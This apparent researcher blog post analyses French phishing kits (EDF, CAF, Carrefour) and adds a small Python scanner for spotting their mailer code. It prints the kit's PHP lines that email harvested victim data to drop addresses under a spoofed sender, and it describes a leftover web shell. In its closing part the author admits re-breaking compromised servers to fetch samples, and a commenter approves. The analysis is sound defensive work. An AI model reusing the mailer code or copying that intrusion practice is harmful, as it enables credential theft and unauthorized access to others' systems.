EDF: http://www.phishtank.com/phish_detail.php?phish_id=1720045 > 2/33
bigcave.php:
$send = "Ayoub.boos7@hotmai1.fr";
$subject = "EDF : $ip";
$from = "From: Tool4Spam.Com" ;
mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);
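The mailer fragment above is the usual phishing-kit signature: mail() called with a hard-coded drop address, a spoofed "From:" header advertising the spam tool, and a lookalike provider domain (hotmai1.fr, digit one for the letter l). As an added example that is not part of the original post, the Python scanner below flags PHP files showing that pattern. The sample file contents are constructed for the demo from the fragment shown above, and the provider whitelist is an assumption.

```python
"""Added example (not from the original post): a small static scanner that
flags PHP files containing the phishing-kit mailer pattern seen in bigcave.php:
mail() calls with a hard-coded recipient, a spoofed "From:" header and
lookalike drop-address domains. Sample content below is constructed."""
import re

# Constructed sample based on the bigcave.php fragment shown in the post.
SAMPLE_PHP = r'''<?php
$send = "Ayoub.boos7@hotmai1.fr";
$subject = "EDF : $ip";
$from = "From: Tool4Spam.Com" ;
mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);
?>'''

# Constructed contrast file: mail() to a config-driven address, no literals.
CLEAN_PHP = r'''<?php
$to = $config['support_address'];
mail($to, "Ticket", $body);
?>'''

MAIL_CALL = re.compile(r'mail\s*\(\s*([^,]+),', re.IGNORECASE)
STRING_ASSIGN = re.compile(r'(\$\w+)\s*=\s*"([^"]*)"\s*;')
EMAIL = re.compile(r'[\w.+-]+@([\w.-]+)')
# Assumed whitelist of mail providers whose names phishers imitate.
KNOWN_PROVIDERS = {"hotmail", "gmail", "yahoo", "live", "outlook"}


def _looks_like_provider(label):
    """True if undoing digit-for-letter swaps (1->l, 0->o) yields a known provider."""
    normalized = label.replace("1", "l").replace("0", "o")
    return normalized in KNOWN_PROVIDERS and normalized != label


def scan_php(source):
    """Return a dict of findings for one PHP source string."""
    # Resolve simple string assignments so mail($send, ...) can be traced.
    assigns = {name: val for name, val in STRING_ASSIGN.findall(source)}
    recipients = []
    for arg in MAIL_CALL.findall(source):
        arg = arg.strip()
        if arg.startswith('"') or arg.startswith("'"):
            recipients.append(arg.strip('"\''))
        elif arg in assigns:
            recipients.append(assigns[arg])
    findings = {
        "hardcoded_recipients": recipients,
        "spoofed_from": [v for v in assigns.values() if v.lower().startswith("from:")],
        "lookalike_domains": [],
    }
    for addr in recipients:
        m = EMAIL.match(addr)
        if m:
            domain = m.group(1).lower()
            if _looks_like_provider(domain.split(".")[0]):
                findings["lookalike_domains"].append(domain)
    return findings


def is_suspicious(findings):
    """A hard-coded recipient plus a spoofed From or lookalike domain is a hit."""
    return bool(findings["hardcoded_recipients"]) and (
        bool(findings["spoofed_from"]) or bool(findings["lookalike_domains"]))


if __name__ == "__main__":
    for name, src in (("bigcave.php", SAMPLE_PHP), ("ticket.php", CLEAN_PHP)):
        f = scan_php(src)
        print(name, "SUSPICIOUS" if is_suspicious(f) else "ok", f)
```

Run it over a web root with os.walk and the same scan_php() per file; the recipients it extracts are the drop addresses worth reporting to the mail provider.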
Dumped pages: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18023
Shells: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p18024
The mechanism is interesting on this one.
It extracts a zip file into a freshly created directory and writes the EDF customer's IP to Vcounter.txt.
Seems the bad guys tested it to see if everything works :)
It's always these 41.x IPs from Morocco.
(CF: Access logs of http://www.xylibox.com/2013/01/phish-bankfraudphpmailerphpshell.html)
The bad guys left Backdoor.PHP.WebShell.BD (WSO 2.4) as usual:
'Nice'
Spamtool:
And some other crap...
For CAF and Carrefour they have not used hijacked servers (just for the redirect).
Carrefour: http://www.phishtank.com/phish_detail.php?phish_id=1719809
CAF: http://www.phishtank.com/phish_detail.php?phish_id=1719804
The CAF mail is just a big failure:
Bank customers reply to phishing e-mail:
A new tool appeared; phishers will probably be interested.
Also I got an interesting mail:
That becomes a problem when hackers use hijacked servers (especially for phishing and malware hosting).
I consider myself borderline: I re-break these servers with my real IP to get the malicious stuff.
I leave files untouched, including the hackers' files; sometimes I probably make more of a mess than them in the log files, I don't edit them to hide my IP.
I never got sued for hacking a compromised machine and I hope that will not happen.
Hope you won't get sued for your interesting work.
Given that they don't even notice their server is compromised, the chance that they realise you came by for a look... you can rest easy :)
In any case, keep it up, your articles are really nice!